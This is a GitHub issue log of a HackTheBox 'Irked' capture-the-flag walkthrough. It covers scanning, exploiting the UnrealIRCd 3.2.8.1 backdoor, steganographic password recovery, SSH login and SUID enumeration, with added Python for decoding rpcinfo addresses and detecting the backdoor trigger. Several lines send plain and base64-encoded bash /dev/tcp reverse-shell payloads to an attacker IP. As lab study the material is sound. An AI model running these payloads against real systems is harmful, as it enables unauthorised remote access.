roaris / ctf-log


HackTheBox: Irked (Machine Easy) #43

Open roaris opened 1 month ago

roaris commented 1 month ago

https://app.hackthebox.com/machines/Irked

$ nmap -sC -sV -Pn 10.10.10.117
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-25 21:14 JST
Nmap scan report for 10.10.10.117
Host is up (0.17s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
| ssh-hostkey:
|   1024 6a:5d:f5:bd:cf:83:78:b6:75:31:9b:dc:79:c5:fd:ad (DSA)
|   2048 75:2e:66:bf:b9:3c:cc:f7:7e:84:8a:8b:f0:81:02:33 (RSA)
|   256 c8:a3:a2:5e:34:9a:c4:9b:90:53:f7:50:bf:ea:25:3b (ECDSA)
|_  256 8d:1b:43:c7:d0:1a:4c:05:cf:82:ed:c1:01:63:a2:0c (ED25519)
80/tcp  open  http    Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Site doesn't have a title (text/html).
111/tcp open  rpcbind 2-4 (RPC #100000)
| rpcinfo:
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          36100/tcp   status
|   100024  1          43306/udp6  status
|   100024  1          44305/udp   status
|_  100024  1          53681/tcp6  status
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 31.00 seconds

roaris commented 1 month ago

https://developer.mozilla.org/ja/docs/Glossary/IRC

IRC (Internet Relay Chat) is a worldwide chat system that requires an internet connection and an IRC client that sends and receives messages via an IRC server.

Never heard of it. Is it related to port 111 being open?

I looked into vulnerabilities in Apache 2.4.10, but there was nothing that looked usable.

roaris commented 1 month ago

Accessing /manual/ redirects via meta refresh to /manual/en/index.html, and the Apache manual comes up.

$ gobuster dir --url http://10.10.10.117 --wordlist=/usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -f
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.117
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Add Slash:               true
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/icons/               (Status: 403) [Size: 293]
/manual/              (Status: 200) [Size: 626]
Progress: 44679 / 87665 (50.97%)[ERROR] Get "http://10.10.10.117/097524020X/": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] Get "http://10.10.10.117/bugreports/": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] Get "http://10.10.10.117/000689/": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] Get "http://10.10.10.117/000649/": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] Get "http://10.10.10.117/000331/": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 51580 / 87665 (58.84%)[ERROR] Get "http://10.10.10.117/36283/": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] Get "http://10.10.10.117/35445/": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] Get "http://10.10.10.117/36281/": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] Get "http://10.10.10.117/35949/": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] Get "http://10.10.10.117/36657/": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] Get "http://10.10.10.117/31339/": dial tcp 10.10.10.117:80: i/o timeout (Client.Timeout exceeded while awaiting headers)
[ERROR] Get "http://10.10.10.117/5251/": dial tcp 10.10.10.117:80: i/o timeout (Client.Timeout exceeded while awaiting headers)
[ERROR] Get "http://10.10.10.117/5777/": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] Get "http://10.10.10.117/35456/": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] Get "http://10.10.10.117/32115/": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 87664 / 87665 (100.00%)
===============================================================
Finished
===============================================================

roaris commented 1 month ago

I restricted the search period to before the machine's release date (2018/11/17) and searched for "rpcbind exploit", but couldn't figure anything out.

Without the date restriction, a writeup of another machine that uses port 111 came up: https://sanposhiho.com/posts/2020-09-06-qiita-fbb2689111821d99de85/

Copying the commands from it.

$ nmap -p 111 -script=nfs-ls,nfs-statfs,nfs-showmount 10.10.10.117
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-25 21:58 JST
Nmap scan report for 10.10.10.117
Host is up (0.17s latency).

PORT    STATE SERVICE
111/tcp open  rpcbind

Nmap done: 1 IP address (1 host up) scanned in 2.51 seconds

Nothing came out.

roaris commented 1 month ago

https://book.hacktricks.xyz/network-services-pentesting/pentesting-rpcbind

Portmapper is a service that is utilized for mapping network service ports to RPC (Remote Procedure Call) program numbers. It acts as a critical component in Unix-based systems, facilitating the exchange of information between these systems. The port associated with Portmapper is frequently scanned by attackers as it can reveal valuable information. This information includes the type of Unix Operating System (OS) running and details about the services that are available on the system. Additionally, Portmapper is commonly used in conjunction with NFS (Network File System), NIS (Network Information Service), and other RPC-based services to manage network services effectively.

$ rpcinfo 10.10.10.117
   program version netid     address                service    owner
    100000    4    tcp6      ::.0.111               portmapper superuser
    100000    3    tcp6      ::.0.111               portmapper superuser
    100000    4    udp6      ::.0.111               portmapper superuser
    100000    3    udp6      ::.0.111               portmapper superuser
    100000    4    tcp       0.0.0.0.0.111          portmapper superuser
    100000    3    tcp       0.0.0.0.0.111          portmapper superuser
    100000    2    tcp       0.0.0.0.0.111          portmapper superuser
    100000    4    udp       0.0.0.0.0.111          portmapper superuser
    100000    3    udp       0.0.0.0.0.111          portmapper superuser
    100000    2    udp       0.0.0.0.0.111          portmapper superuser
    100000    4    local     /run/rpcbind.sock      portmapper superuser
    100000    3    local     /run/rpcbind.sock      portmapper superuser
    100024    1    udp       0.0.0.0.173.17         status     107
    100024    1    tcp       0.0.0.0.141.4          status     107
    100024    1    udp6      ::.169.42              status     107
    100024    1    tcp6      ::.209.177             status     107

Is the address column in IPv6? I have no idea how to read it.
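The address column is rpcbind's "universal address" format: the host part ("::" is the IPv6 unspecified address, "0.0.0.0" its IPv4 counterpart) followed by the port as two decimal bytes, high byte first, so 0.0.0.0.173.17 is port 173*256+17 = 44305, the same status port nmap listed as 44305/udp. The decoder below is an added example (not part of the issue or of rpcinfo itself); the sample text is a constructed subset of the rpcinfo output above, and decoding it reproduces the four status ports nmap reported.

```python
# Constructed sample: a subset of the rpcinfo lines shown in this issue.
SAMPLE_RPCINFO = """\
   program version netid     address                service    owner
    100000    4    tcp6      ::.0.111               portmapper superuser
    100000    4    tcp       0.0.0.0.0.111          portmapper superuser
    100000    4    local     /run/rpcbind.sock      portmapper superuser
    100024    1    udp       0.0.0.0.173.17         status     107
    100024    1    tcp       0.0.0.0.141.4          status     107
    100024    1    udp6      ::.169.42              status     107
    100024    1    tcp6      ::.209.177             status     107
"""


def decode_uaddr(uaddr):
    """Split an RPC universal address into (host, port).

    TCP/UDP endpoints are printed as <host>.<port_hi>.<port_lo>, so the last
    two dotted fields are the port in big-endian decimal bytes. Unix-socket
    endpoints (netid 'local') carry a filesystem path and have no port.
    """
    if uaddr.startswith("/"):
        return uaddr, None
    host, hi, lo = uaddr.rsplit(".", 2)
    return host, int(hi) * 256 + int(lo)


def parse_rpcinfo(text):
    """Parse rpcinfo output into a list of dicts with the port decoded."""
    entries = []
    for line in text.splitlines()[1:]:  # first line is the header row
        parts = line.split()
        if len(parts) < 6:
            continue
        prog, ver, netid, uaddr, service, owner = parts[:6]
        host, port = decode_uaddr(uaddr)
        entries.append({"program": int(prog), "version": int(ver), "netid": netid,
                        "host": host, "port": port, "service": service, "owner": owner})
    return entries


def status_ports(entries):
    """Return {netid: port} for rpc.statd (program 100024) registrations."""
    return {e["netid"]: e["port"] for e in entries if e["program"] == 100024}


if __name__ == "__main__":
    for netid, port in status_ports(parse_rpcinfo(SAMPLE_RPCINFO)).items():
        print(f"status listens on {netid} port {port}")
```

Inventorying the ports this way matters on the defensive side because rpcbind hands out these high, dynamically chosen ports to anyone who asks; firewalling port 111 alone does not close the services it advertises.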

roaris commented 1 month ago

I was stuck, so I looked at https://www.tagnull.de/post/irked/ (there was no Guided Mode). Apparently you scan all ports.

$ nmap -p- 10.10.10.117
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-25 22:16 JST

It never finishes. Since the open port is apparently 6697, I just confirmed that it's open and moved on.

$ nmap -p 6697 10.10.10.117
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-25 22:18 JST
Nmap scan report for 10.10.10.117
Host is up (0.17s latency).

PORT     STATE SERVICE
6697/tcp open  ircs-u

Nmap done: 1 IP address (1 host up) scanned in 1.40 seconds

roaris commented 1 month ago

Apparently you use an IRC client called HexChat, but it looked like it can only be installed on Windows https://hexchat.github.io/downloads.html

So I looked at the official writeup. The official writeup finds port 8067.

$ nmap -p 8067 10.10.10.117
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-25 22:36 JST
Nmap scan report for 10.10.10.117
Host is up (0.17s latency).

PORT     STATE SERVICE
8067/tcp open  infi-async

Nmap done: 1 IP address (1 host up) scanned in 1.40 seconds

Run the irssi command against port 8067. It wasn't installed, so I installed it.

$ sudo apt install irssi
$ man irssi
Irssi(1)                                       General Commands Manual                                       Irssi(1)

NAME
       Irssi - a modular IRC client for UNIX

SYNOPSIS
       irssi [--config=PATH] [--home=PATH] [-dv!?] [-c server] [-p port] [-n nickname] [-w password] [-h hostname]

DESCRIPTION
       Irssi  is  a  modular Internet Relay Chat client; it is highly extensible and very secure. Being a fullscreen,
       termcap based client with many features, Irssi is easily extensible through scripts and modules.
...

This is also an IRC client, apparently.

roaris commented 1 month ago

Running irssi -c 10.10.10.117 -p 8067 takes over the terminal. Typing exit is supposed to return it, but it didn't.

 Irssi v1.4.5 - https://irssi.org
22:43 -!- Irssi: Looking up 10.10.10.117
22:43 -!- Irssi: The following settings were initialized
22:43                        real_name
22:43 -!- Irssi: Connecting to 10.10.10.117 [10.10.10.117] port 8067
22:43 Waiting for CAP LS response...
22:43 -!- Irssi: Connection to 10.10.10.117 established
22:43 !irked.htb *** Looking up your hostname...
22:44 !irked.htb *** Couldn't resolve your hostname; using your IP address instead
22:44 -!- Welcome to the ROXnet IRC Network roaris!roaris@10.10.14.50
22:44 -!- Your host is irked.htb, running version Unreal3.2.8.1
22:44 -!- This server was created Mon May 14 2018 at 13:12:50 EDT
22:44 -!- irked.htb Unreal3.2.8.1 iowghraAsORTVSxNCWqBzvdHtGp lvhopsmntikrRcaqOALQbSeIKVfMCuzNTGj
22:44 -!- UHNAMES NAMESX SAFELIST HCN MAXCHANNELS=10 CHANLIMIT=#:10 MAXLIST=b:60,e:60,I:60 NICKLEN=30 CHANNELLEN=32
          TOPICLEN=307 KICKLEN=307 AWAYLEN=307 MAXTARGETS=20 are supported by this server
22:44 -!- WALLCHOPS WATCH=128 WATCHOPTS=A SILENCE=15 MODES=12 CHANTYPES=# PREFIX=(qaohv)~&@%+
          CHANMODES=beI,kfL,lj,psmntirRcOAQKVCuzNSMTG NETWORK=ROXnet CASEMAPPING=ascii EXTBAN=~,cqnr ELIST=MNUCT
          STATUSMSG=~&@%+ are supported by this server
22:44 -!- EXCEPTS INVEX CMDS=KNOCK,MAP,DCCALLOW,USERIP are supported by this server
22:44 -!- There are 1 users and 0 invisible on 1 servers
22:44 -!- 1 unknown connection(s)
22:44 -!- I have 1 clients and 0 servers
22:44 -!- Current Local Users: 1  Max: 1
22:44 -!- Current Global Users: 1  Max: 1
22:44 -!- MOTD File is missing
22:44 -!- Mode change [+iwx] for user roaris
22:44 -!- You may not reregister

 [22:45] [roaris(+iwx)] [1:10 (change with ^X)]  

Apparently you focus on Unreal3.2.8.1 in this output. There's an IRC daemon called UnrealIRCd. Incidentally, irssi -c 10.10.10.117 -p 6697 also revealed Unreal3.2.8.1.

roaris commented 1 month ago

Unreal 3.2.8.1 contains a backdoor, CVE-2010-2075. Apparently, if you put a command after AB;, it gets executed.

So far I'd been jumping straight to a reverse shell, but this time I'll check connectivity first.

$ echo "AB; ping 10.10.14.50" | nc 10.10.10.117 8067
$ sudo tcpdump -i tun0 icmp                                                                                                                                                  
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
23:04:09.291342 IP 10.10.10.117 > 10.10.14.50: ICMP echo request, id 7883, seq 70, length 64
23:04:09.291363 IP 10.10.14.50 > 10.10.10.117: ICMP echo reply, id 7883, seq 70, length 64
23:04:10.290579 IP 10.10.10.117 > 10.10.14.50: ICMP echo request, id 7883, seq 71, length 64
23:04:10.290588 IP 10.10.14.50 > 10.10.10.117: ICMP echo reply, id 7883, seq 71, length 64
23:04:11.291308 IP 10.10.10.117 > 10.10.14.50: ICMP echo request, id 7883, seq 72, length 64
23:04:11.291330 IP 10.10.14.50 > 10.10.10.117: ICMP echo reply, id 7883, seq 72, length 64

roaris commented 1 month ago

Even though connectivity was confirmed, the reverse shell doesn't run. Port 6697 doesn't work either.

$ echo "AB; bash -i >& /dev/tcp/10.10.14.50/4444 0>&1" | nc 10.10.10.117 8067

The official writeup base64-encodes the payload to bypass a filter and targets port 65534, but that didn't work either.

$ echo "bash -i >& /dev/tcp/10.10.14.50/4444 0>&1" | base64
YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC41MC80NDQ0IDA+JjEK
$ echo "AB; echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC41MC80NDQ0IDA+JjEK | base64 -d | bash" | nc 10.10.10.117 65534
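The two comments above show what the CVE-2010-2075 trigger looks like on the wire: a raw client line beginning with AB;, first with a plain command and then with a base64-wrapped one. From the detection side, the useful property is that the trigger sits at the very start of the line, before any IRC command parsing, so a sensor (or a server-side pre-parse hook) can flag it regardless of how the payload is encoded. The scanner below is an added example, not part of this issue or of UnrealIRCd; the sample lines are constructed from the payloads shown above, and the base64 decoding only exists so an analyst sees the wrapped command in the alert.

```python
import base64
import binascii
import re

# Constructed sample of raw lines as received from a client; lines 3 and 4 are
# the two trigger forms shown in this issue, the rest are ordinary IRC traffic.
SAMPLE_LINES = [
    "NICK roaris",
    "USER roaris 0 * :roaris",
    "AB; ping 10.10.14.50",
    "AB; echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC41MC80NDQ0IDA+JjEK | base64 -d | bash",
    "PRIVMSG #chan :AB; is just text here",
]

BACKDOOR_PREFIX = "AB;"
# A run of base64 alphabet long enough to be a wrapped command, not a nick or a word.
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def decode_b64_blobs(cmd):
    """Return the printable plaintexts of any base64 blobs embedded in cmd."""
    decoded = []
    for m in B64_TOKEN.finditer(cmd):
        try:
            raw = base64.b64decode(m.group(0), validate=True)
        except binascii.Error:
            continue  # not valid base64 after all
        text = raw.decode("ascii", errors="replace").rstrip("\n")
        if text.isprintable():
            decoded.append(text)
    return decoded


def inspect_line(line):
    """Classify one raw client line: None when benign, else a finding dict.

    Only a prefix match counts; 'AB;' in the middle of a PRIVMSG is chat text.
    """
    if not line.startswith(BACKDOOR_PREFIX):
        return None
    cmd = line[len(BACKDOOR_PREFIX):].strip()
    return {"line": line, "command": cmd, "decoded": decode_b64_blobs(cmd)}


def scan(lines):
    """Run inspect_line over a batch of lines and keep the findings."""
    return [f for f in map(inspect_line, lines) if f is not None]


if __name__ == "__main__":
    for finding in scan(SAMPLE_LINES):
        print("backdoor trigger:", finding["command"])
        for text in finding["decoded"]:
            print("  decodes to:", text)
```

The real fix is of course not detection but removing the trojaned 3.2.8.1 build; the scanner is the kind of thing you would run over pcap-extracted client streams to confirm whether a vulnerable server was actually triggered.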

roaris commented 1 month ago

After restarting the machine it worked. It didn't work without base64 encoding.

$ echo "AB; echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC41MC80NDQ0IDA+JjEK | base64 -d | bash" | nc 10.10.10.117 8067
:irked.htb NOTICE AUTH :*** Looking up your hostname...
:irked.htb NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
$ nc -lvp 4444
listening on [any] 4444 ...
10.10.10.117: inverse host lookup failed: Unknown host
connect to [10.10.14.50] from (UNKNOWN) [10.10.10.117] 45491
bash: cannot set terminal process group (613): Inappropriate ioctl for device
bash: no job control in this shell
ircd@irked:~/Unreal3.2$

roaris commented 1 month ago

Couldn't read user.txt.

ircd@irked:~/Unreal3.2$ ls -al /home
ls -al /home
total 16
drwxr-xr-x  4 root     root     4096 Sep  5  2022 .
drwxr-xr-x 21 root     root     4096 Sep  8  2022 ..
drwxr-xr-x 18 djmardov djmardov 4096 Sep  5  2022 djmardov
drwxr-xr-x  3 ircd     root     4096 Sep  5  2022 ircd
ircd@irked:~/Unreal3.2$ ls -al /home/ircd
ls -al /home/ircd
total 16
drwxr-xr-x  3 ircd root 4096 Sep  5  2022 .
drwxr-xr-x  4 root root 4096 Sep  5  2022 ..
lrwxrwxrwx  1 root root    9 Sep  5  2022 .bash_history -> /dev/null
-rw-r--r--  1 ircd ircd    0 May 14  2018 .bashrc
-rw-r--r--  1 ircd ircd   66 May 14  2018 .selected_editor
drwx------ 13 ircd ircd 4096 May 25 10:21 Unreal3.2
ircd@irked:~/Unreal3.2$ ls -al /home/djmardov
ls -al /home/djmardov
total 96
drwxr-xr-x 18 djmardov djmardov 4096 Sep  5  2022 .
drwxr-xr-x  4 root     root     4096 Sep  5  2022 ..
lrwxrwxrwx  1 root     root        9 Nov  3  2018 .bash_history -> /dev/null
-rw-r--r--  1 djmardov djmardov  220 May 11  2018 .bash_logout
-rw-r--r--  1 djmardov djmardov 3515 May 11  2018 .bashrc
drwx------ 13 djmardov djmardov 4096 Sep  5  2022 .cache
drwx------ 15 djmardov djmardov 4096 Sep  5  2022 .config
drwx------  3 djmardov djmardov 4096 Sep  5  2022 .dbus
drwxr-xr-x  2 djmardov djmardov 4096 Sep  5  2022 Desktop
drwxr-xr-x  2 djmardov djmardov 4096 Sep  5  2022 Documents
drwxr-xr-x  2 djmardov djmardov 4096 Sep  5  2022 Downloads
drwx------  3 djmardov djmardov 4096 Sep  5  2022 .gconf
drwx------  2 djmardov djmardov 4096 Sep  5  2022 .gnupg
-rw-------  1 djmardov djmardov 4706 Nov  3  2018 .ICEauthority
drwx------  3 djmardov djmardov 4096 Sep  5  2022 .local
drwx------  4 djmardov djmardov 4096 Sep  5  2022 .mozilla
drwxr-xr-x  2 djmardov djmardov 4096 Sep  5  2022 Music
drwxr-xr-x  2 djmardov djmardov 4096 Sep  5  2022 Pictures
-rw-r--r--  1 djmardov djmardov  675 May 11  2018 .profile
drwxr-xr-x  2 djmardov djmardov 4096 Sep  5  2022 Public
drwx------  2 djmardov djmardov 4096 Sep  5  2022 .ssh
drwxr-xr-x  2 djmardov djmardov 4096 Sep  5  2022 Templates
-rw-r-----  1 root     djmardov   33 May 25 10:21 user.txt
drwxr-xr-x  2 djmardov djmardov 4096 Sep  5  2022 Videos
ircd@irked:~/Unreal3.2$ cat /home/djmardov/user.txt
cat /home/djmardov/user.txt
cat: /home/djmardov/user.txt: Permission denied

roaris commented 1 month ago

I tried the following but got no clues.

ircd@irked:~$ ls -al /home/ircd
ls -al /home/ircd
total 16
drwxr-xr-x  3 ircd root 4096 Sep  5  2022 .
drwxr-xr-x  4 root root 4096 Sep  5  2022 ..
lrwxrwxrwx  1 root root    9 Sep  5  2022 .bash_history -> /dev/null
-rw-r--r--  1 ircd ircd    0 May 14  2018 .bashrc
-rw-r--r--  1 ircd ircd   66 May 14  2018 .selected_editor
drwx------ 13 ircd ircd 4096 May 25 10:21 Unreal3.2
ircd@irked:~$ ls -al /home/djmardov
ls -al /home/djmardov
total 96
drwxr-xr-x 18 djmardov djmardov 4096 Sep  5  2022 .
drwxr-xr-x  4 root     root     4096 Sep  5  2022 ..
lrwxrwxrwx  1 root     root        9 Nov  3  2018 .bash_history -> /dev/null
-rw-r--r--  1 djmardov djmardov  220 May 11  2018 .bash_logout
-rw-r--r--  1 djmardov djmardov 3515 May 11  2018 .bashrc
drwx------ 13 djmardov djmardov 4096 Sep  5  2022 .cache
drwx------ 15 djmardov djmardov 4096 Sep  5  2022 .config
drwx------  3 djmardov djmardov 4096 Sep  5  2022 .dbus
drwxr-xr-x  2 djmardov djmardov 4096 Sep  5  2022 Desktop
drwxr-xr-x  2 djmardov djmardov 4096 Sep  5  2022 Documents
drwxr-xr-x  2 djmardov djmardov 4096 Sep  5  2022 Downloads
drwx------  3 djmardov djmardov 4096 Sep  5  2022 .gconf
drwx------  2 djmardov djmardov 4096 Sep  5  2022 .gnupg
-rw-------  1 djmardov djmardov 4706 Nov  3  2018 .ICEauthority
drwx------  3 djmardov djmardov 4096 Sep  5  2022 .local
drwx------  4 djmardov djmardov 4096 Sep  5  2022 .mozilla
drwxr-xr-x  2 djmardov djmardov 4096 Sep  5  2022 Music
drwxr-xr-x  2 djmardov djmardov 4096 Sep  5  2022 Pictures
-rw-r--r--  1 djmardov djmardov  675 May 11  2018 .profile
drwxr-xr-x  2 djmardov djmardov 4096 Sep  5  2022 Public
drwx------  2 djmardov djmardov 4096 Sep  5  2022 .ssh
drwxr-xr-x  2 djmardov djmardov 4096 Sep  5  2022 Templates
-rw-r-----  1 root     djmardov   33 May 25 10:21 user.txt
drwxr-xr-x  2 djmardov djmardov 4096 Sep  5  2022 Videos
ircd@irked:~$ ls -al /var/www
ls -al /var/www
total 24
drwxr-xr-x  3 root root  4096 May 14  2018 .
drwxr-xr-x 13 root root  4096 May 11  2018 ..
drwxr-xr-x  2 root root  4096 May 15  2018 html
-rw-r--r--  1 root root 10701 May 11  2018 index.old
ircd@irked:~$ sudo -l
sudo -l
bash: sudo: command not found
ircd@irked:~$ uname -rs
uname -rs
Linux 3.16.0-6-686-pae

roaris commented 1 month ago

Apparently you look at /home/djmardov/Documents.

ircd@irked:/home/djmardov$ ls -al Documents
ls -al Documents
total 12
drwxr-xr-x  2 djmardov djmardov 4096 Sep  5  2022 .
drwxr-xr-x 18 djmardov djmardov 4096 Sep  5  2022 ..
-rw-r--r--  1 djmardov djmardov   52 May 16  2018 .backup
lrwxrwxrwx  1 root     root       23 Sep  5  2022 user.txt -> /home/djmardov/user.txt
ircd@irked:/home/djmardov$ cat Documents/.backup
cat Documents/.backup
Super elite steg backup pw
UPupDOWNdownLRlrBAbaSSss

Well, even looking at this I have no idea what to do.

roaris commented 1 month ago

steg apparently means steganography, hiding information inside images.

Apparently you use the image on port 80. The steghide command can hide information and extract hidden information. The information was written to pass.txt.

$ wget http://10.10.10.117/irked.jpg
$ sudo apt install steghide
$ steghide extract -sf irked.jpg -p UPupDOWNdownLRlrBAbaSSss
wrote extracted data to "pass.txt".
$ cat pass.txt
Kab6h+m+bbp2J:HG

roaris commented 1 month ago

Log in via ssh as djmardov / Kab6h+m+bbp2J:HG. Got user.txt.

$ ssh djmardov@10.10.10.117
The authenticity of host '10.10.10.117 (10.10.10.117)' can't be established.
ED25519 key fingerprint is SHA256:Ej828KWlDpyEOvOxHAspautgmarzw646NS31tX3puFg.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.117' (ED25519) to the list of known hosts.
djmardov@10.10.10.117's password:

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue May 15 08:56:32 2018 from 10.33.3.3
djmardov@irked:~$ cat user.txt
2c03fedaeeaec3288ed5d8a962d3a044

roaris commented 1 month ago

The official writeup looks for files with setuid set.

djmardov@irked:~$ find / -type f -perm -4000 2>/dev/null
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/spice-gtk/spice-client-glib-usb-acl-helper
/usr/sbin/exim4
/usr/sbin/pppd
/usr/bin/chsh
/usr/bin/procmail
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/at
/usr/bin/pkexec
/usr/bin/X
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/viewuser
/sbin/mount.nfs
/bin/su
/bin/mount
/bin/fusermount
/bin/ntfs-3g
/bin/umount

On listing the suid files a file /usr/bin/viewuser is noticed which isn’t present on Debian by default.

It says that, but with this many, jumping straight to /usr/bin/viewuser is a stretch.

https://sanposhiho.com/posts/2020-03-06-qiita-fe1f4b35cf74f09a6cb8/ uses something called linuxprivchecker, so I'll try it.

roaris commented 1 month ago

It ran with python2.

djmardov@irked:~$ python3 linuxprivchecker.py > linuxprivchecker.txt
  File "linuxprivchecker.py", line 74
    print "[+] " + msg
               ^
SyntaxError: Missing parentheses in call to 'print'
djmardov@irked:~$ python2 linuxprivchecker.py > linuxprivchecker.txt

There's way too much output. Among it is a list of files/directories with setuid and setgid set (what does setting setuid/setgid on a directory even mean?)

[+] SUID/SGID Files and Directories
    -rwxr-sr-x 1 root mail 13680 Dec 24  2016 /usr/lib/evolution/camel-lock-helper-1.2
    -rwxr-sr-x 1 root utmp 13992 Jun 23  2014 /usr/lib/libvte-2.90-9/gnome-pty-helper
    -rwxr-sr-x 1 root utmp 13992 Dec  5  2014 /usr/lib/libvte-2.91-0/gnome-pty-helper
    -rwxr-sr-x 1 root utmp 4972 Feb 21  2011 /usr/lib/utempter/utempter
    -rwsr-xr-- 1 root messagebus 362672 Nov 21  2016 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
    -rwsr-xr-x 1 root root 9468 Mar 28  2017 /usr/lib/eject/dmcrypt-get-device
    -rwsr-xr-x 1 root root 13816 Sep  8  2016 /usr/lib/policykit-1/polkit-agent-helper-1
    -rwsr-xr-x 1 root root 562536 Nov 19  2017 /usr/lib/openssh/ssh-keysign
    -rwsr-xr-x 1 root root 13564 Oct 14  2014 /usr/lib/spice-gtk/spice-client-glib-usb-acl-helper
    drwxrwsr-t 2 root lpadmin 4096 Sep  5  2022 /usr/share/ppd/custom
    -rwsr-xr-x 1 root root 1085300 Feb 10  2018 /usr/sbin/exim4
    -rwsr-xr-- 1 root dip 338948 Apr 14  2015 /usr/sbin/pppd
    -rwxr-sr-x 1 root tty 26240 Mar 29  2015 /usr/bin/wall
    -rwxr-sr-x 1 root mail 17880 Nov 18  2017 /usr/bin/lockfile
    -rwsr-xr-x 1 root root 43576 May 17  2017 /usr/bin/chsh
    -rwsr-sr-x 1 root mail 96192 Nov 18  2017 /usr/bin/procmail
    -rwsr-xr-x 1 root root 78072 May 17  2017 /usr/bin/gpasswd
    -rwsr-xr-x 1 root root 38740 May 17  2017 /usr/bin/newgrp
    -rwsr-sr-x 1 daemon daemon 50644 Sep 30  2014 /usr/bin/at
    -rwxr-sr-x 1 root shadow 21964 May 17  2017 /usr/bin/expiry
    -rwxr-sr-x 1 root tty 9680 Oct 17  2014 /usr/bin/bsd-write
    -rwxr-sr-x 1 root mail 9772 Dec  4  2014 /usr/bin/mutt_dotlock
    -rwxr-sr-x 1 root ssh 419192 Nov 19  2017 /usr/bin/ssh-agent
    -rwsr-xr-x 1 root root 18072 Sep  8  2016 /usr/bin/pkexec
    -rwxr-sr-x 1 root mail 13892 Jun  2  2013 /usr/bin/dotlockfile
    -rwxr-sr-x 1 root crontab 38844 Jun  7  2015 /usr/bin/crontab
    -rwsr-sr-x 1 root root 9468 Apr  1  2014 /usr/bin/X
    -rwsr-xr-x 1 root root 53112 May 17  2017 /usr/bin/passwd
    -rwxr-sr-x 1 root mlocate 32116 Jun 13  2013 /usr/bin/mlocate
    -rwsr-xr-x 1 root root 52344 May 17  2017 /usr/bin/chfn
    -rwxr-sr-x 1 root shadow 61232 May 17  2017 /usr/bin/chage
    -rwsr-xr-x 1 root root 7328 May 16  2018 /usr/bin/viewuser
    drwxrwsr-x 10 root staff 4096 Sep  5  2022 /usr/local
    drwxrwsr-x 2 root staff 4096 Sep  5  2022 /usr/local/include
    drwxrwsr-x 2 root staff 4096 Sep  5  2022 /usr/local/etc
    drwxrwsr-x 4 root staff 4096 Sep  5  2022 /usr/local/lib
    drwxrwsr-x 4 root staff 4096 Sep  5  2022 /usr/local/lib/python2.7
    drwxrwsr-x 2 root staff 4096 Sep  5  2022 /usr/local/lib/python2.7/site-packages
    drwxrwsr-x 2 root staff 4096 Sep  5  2022 /usr/local/lib/python2.7/dist-packages
    drwxrwsr-x 3 root staff 4096 Sep  5  2022 /usr/local/lib/python3.4
    drwxrwsr-x 2 root staff 4096 Sep  5  2022 /usr/local/lib/python3.4/dist-packages
    drwxrwsr-x 8 root staff 4096 Sep  5  2022 /usr/local/share
    drwxrwsr-x 6 root staff 4096 Sep  5  2022 /usr/local/share/xml
    drwxrwsr-x 2 root staff 4096 Sep  5  2022 /usr/local/share/xml/declaration
    drwxrwsr-x 2 root staff 4096 Sep  5  2022 /usr/local/share/xml/entities
    drwxrwsr-x 2 root staff 4096 Sep  5  2022 /usr/local/share/xml/schema
